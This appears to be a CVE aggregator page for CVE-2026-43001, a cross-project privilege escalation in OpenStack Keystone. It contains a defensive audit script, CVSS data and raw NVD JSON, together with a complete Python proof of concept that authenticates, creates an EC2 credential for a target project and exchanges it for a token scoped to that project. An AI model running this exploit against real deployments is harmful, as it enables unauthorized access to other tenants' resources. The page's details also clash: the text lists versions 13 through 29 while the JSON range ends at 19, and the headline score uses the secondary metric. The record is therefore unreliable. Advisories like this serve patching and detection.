Security Vulnerability Report
CVE-2026-43001 CVSS 7.9 HIGH

CVE-2026-43001

Published: 2026-05-01 09:16:17
Last Modified: 2026-05-04 18:25:50

Description

An issue was discovered in OpenStack Keystone 13 through 29. POST /v3/credentials did not validate that the caller-supplied project_id for an EC2-type credential matched the project of the authenticating application credential. This allowed an attacker holding an unrestricted application credential for project A to create an EC2 credential targeting project B; a subsequent /v3/ec2tokens exchange would then issue a Keystone token scoped to project B while still carrying the original app_cred_id, enabling cross-project lateral movement within the credential owner's role footprint.
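An audit for the condition described above, added here as an example (it is not Keystone code and not part of the original record): it flags EC2 credentials whose project differs from the project of the application credential that created them. The record shapes, the `app_cred_id` key inside the EC2 blob, and all sample values are assumptions constructed for illustration.

```python
import json

# Constructed sample data, not from a real deployment. Assumed shapes: each
# credential has "id", "type", "project_id" and a JSON-string "blob"; EC2 blobs
# created through an application credential carry "app_cred_id".
APP_CRED_PROJECTS = {"appcred-1": "project-a", "appcred-2": "project-b"}
CREDENTIALS = [
    {"id": "c1", "type": "ec2", "project_id": "project-a",
     "blob": json.dumps({"access": "ak1", "secret": "s", "app_cred_id": "appcred-1"})},
    {"id": "c2", "type": "ec2", "project_id": "project-b",
     "blob": json.dumps({"access": "ak2", "secret": "s", "app_cred_id": "appcred-1"})},
    {"id": "c3", "type": "ec2", "project_id": "project-b",
     "blob": json.dumps({"access": "ak3", "secret": "s"})},
    {"id": "c4", "type": "totp", "project_id": None, "blob": "constructed"},
    {"id": "c5", "type": "ec2", "project_id": "project-c",
     "blob": json.dumps({"access": "ak5", "secret": "s", "app_cred_id": "appcred-gone"})},
]


def project_matches(app_cred_project_id, requested_project_id):
    """The comparison the description says was missing at credential creation."""
    return app_cred_project_id is not None and app_cred_project_id == requested_project_id


def audit_ec2_credentials(credentials, app_cred_projects):
    """Return (credential_id, reason) pairs for EC2 credentials that need review."""
    findings = []
    for cred in credentials:
        if (cred.get("type") or "").lower() != "ec2":
            continue
        try:
            blob = json.loads(cred["blob"])
        except (KeyError, TypeError, ValueError):
            findings.append((cred["id"], "unparseable blob"))
            continue
        app_cred_id = blob.get("app_cred_id") if isinstance(blob, dict) else None
        if app_cred_id is None:
            continue  # not created through an application credential
        if app_cred_id not in app_cred_projects:
            findings.append((cred["id"], "unknown application credential"))
        elif not project_matches(app_cred_projects[app_cred_id], cred.get("project_id")):
            findings.append((cred["id"], "project mismatch"))
    return findings


if __name__ == "__main__":
    for cred_id, reason in audit_ec2_credentials(CREDENTIALS, APP_CRED_PROJECTS):
        print(cred_id, reason)
```

A "project mismatch" finding is the state the flaw leaves behind; an "unknown application credential" finding means the owning application credential could not be resolved and the EC2 credential should be reviewed by hand.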

CVSS Details

CVSS Score: 7.9
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openstack:keystone:*:*:*:*:*:*:*:* - VULNERABLE
OpenStack Keystone 13.0.0
OpenStack Keystone 14.0.0
OpenStack Keystone 15.0.0
OpenStack Keystone 16.0.0
OpenStack Keystone 17.0.0
OpenStack Keystone 18.0.0
OpenStack Keystone 19.0.0
OpenStack Keystone 20.0.0
OpenStack Keystone 21.0.0
OpenStack Keystone 22.0.0
OpenStack Keystone 23.0.0
OpenStack Keystone 24.0.0
OpenStack Keystone 25.0.0
OpenStack Keystone 26.0.0
OpenStack Keystone 27.0.0
OpenStack Keystone 28.0.0
OpenStack Keystone 29.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Configuration
KEYSTONE_URL = "https://<keystone_host>:5000"
APP_CRED_ID = "<app_credential_id>"
APP_CRED_SECRET = "<app_credential_secret>"
TARGET_PROJECT_ID = "<target_project_b_id>"  # The attacker wants to access this project

# Step 1: Authenticate using Application Credential for Project A
# to get a scoped token for Project A
auth_url = f"{KEYSTONE_URL}/v3/auth/tokens"
auth_data = {
    "auth": {
        "identity": {
            "methods": ["application_credential"],
            "application_credential": {
                "id": APP_CRED_ID,
                "secret": APP_CRED_SECRET
            }
        }
    }
}
headers = {'Content-Type': 'application/json'}

response = requests.post(auth_url, json=auth_data, headers=headers, verify=False)
if response.status_code != 201:
    print("Failed to authenticate with App Credential")
    exit(1)

project_a_token = response.headers['X-Subject-Token']
print(f"Got token for Project A: {project_a_token[:20]}...")

# Step 2: Exploit the vulnerability - Create EC2 Credential for Project B
# using the token from Project A
ec2_create_url = f"{KEYSTONE_URL}/v3/credentials"
ec2_payload = {
    "credential": {
        "type": "ec2",
        "blob": {},
        "project_id": TARGET_PROJECT_ID  # VULNERABILITY: ID is not validated against token's project
    }
}
ec2_headers = {
    'X-Auth-Token': project_a_token,
    'Content-Type': 'application/json'
}

ec2_response = requests.post(ec2_create_url, json=ec2_payload, headers=ec2_headers, verify=False)

if ec2_response.status_code == 201:
    ec2_cred_data = ec2_response.json()['credential']
    access = ec2_cred_data['blob']['access']
    secret = ec2_cred_data['blob']['secret']
    print(f"Successfully created EC2 Cred for Project B!\nAccess: {access}")

    # Step 3: Exchange EC2 Credential for a Token scoped to Project B
    ec2tokens_url = f"{KEYSTONE_URL}/v3/ec2tokens"
    ec2_auth_payload = {
        "auth": {
            "identity": {
                "methods": ["ec2credential"],
                "ec2credential": {
                    "access": access,
                    "secret": secret
                }
            }
        }
    }
    token_response = requests.post(ec2tokens_url, json=ec2_auth_payload, headers=headers, verify=False)
    if token_response.status_code == 201:
        project_b_token = token_response.headers['X-Subject-Token']
        token_body = token_response.json()['token']
        print(f"Got token scoped to Project: {token_body['project']['id']}")
        if token_body['project']['id'] == TARGET_PROJECT_ID:
            print("[+] Exploit successful! Lateral movement achieved.")
    else:
        print("Failed to exchange EC2 token.")
else:
    print(f"Failed to create EC2 credential: {ec2_response.text}")
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-43001",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-01T09:16:17.273",
    "lastModified": "2026-05-04T18:25:50.420",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in OpenStack Keystone 13 through 29. POST /v3/credentials did not validate that the caller-supplied project_id for an EC2-type credential matched the project of the authenticating application credential. This allowed an attacker holding an unrestricted application credential for project A to create an EC2 credential targeting project B; a subsequent /v3/ec2tokens exchange would then issue a Keystone token scoped to project B while still carrying the original app_cred_id, enabling cross-project lateral movement within the credential owner's role footprint."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L",
            "baseScore": 7.9,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openstack:keystone:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "13.0.0",
                "versionEndIncluding": "19.0.0",
                "matchCriteriaId": "15A2E255-7303-4B2E-8970-0A3E4B40F9BA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://bugs.launchpad.net/keystone/+bug/2149775",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking"]
      },
      {
        "url": "https://review.opendev.org/c/openstack/keystone/+/985804",
        "source": "[email protected]",
        "tags": ["Patch"]
      }
    ]
  }
}
```